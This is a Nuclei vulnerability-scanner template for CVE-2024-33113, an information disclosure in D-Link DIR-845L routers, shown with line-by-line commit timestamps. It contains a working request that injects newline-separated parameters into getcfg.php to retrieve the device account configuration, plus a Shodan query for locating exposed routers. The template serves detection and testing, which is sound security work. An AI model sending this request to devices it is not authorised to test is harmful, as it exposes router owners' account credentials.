nuclei-templates/http/cves/2024/CVE-2024-33113.yaml

41 lines
1.2 KiB
YAML
Raw Normal View History

2024-07-04 10:55:02 +00:00
id: CVE-2024-33113
info:
name: D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure
author: pussycat0x
severity: medium
description: |
2024-07-04 10:58:19 +00:00
D-LINK DIR-845L <=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.
2024-07-04 10:55:02 +00:00
reference:
- https://github.com/FaLLenSKiLL1/CVE-2024-33113
2024-07-04 10:58:19 +00:00
- https://github.com/yj94/Yj_learning/blob/main/Week16/D-LINK-POC.md
classification:
epss-score: 0.00043
epss-percentile: 0.0866
2024-09-10 08:22:50 +00:00
cpe: cpe:2.3:h:dlink:dir-845l:*:*:*:*:*:*:*:*
2024-07-04 10:55:02 +00:00
metadata:
verified: true
2024-07-04 10:58:19 +00:00
max-request: 1
2024-07-04 12:16:31 +00:00
shodan-query: "DIR-845L"
2024-09-10 08:22:50 +00:00
product: dir-845l
vendor: dlink
2024-07-04 12:16:31 +00:00
tags: cve,cve2024,dlink,info-leak
2024-07-04 10:55:02 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<service>DEVICE.ACCOUNT</service>"
- "<seqno>"
condition: and
- type: status
status:
- 200
2024-09-12 05:14:01 +00:00
# digest: 4a0a00473045022100e3f9d3d1c59d4f4542fc862fe8fa407fd1d05656eae59a6699d9db1a08526072022035f387cd8b1181f3d48021a026f02bb9579f348700aab798a5a66fef657cae0c:922c64590222798bb761d5b6d8e72950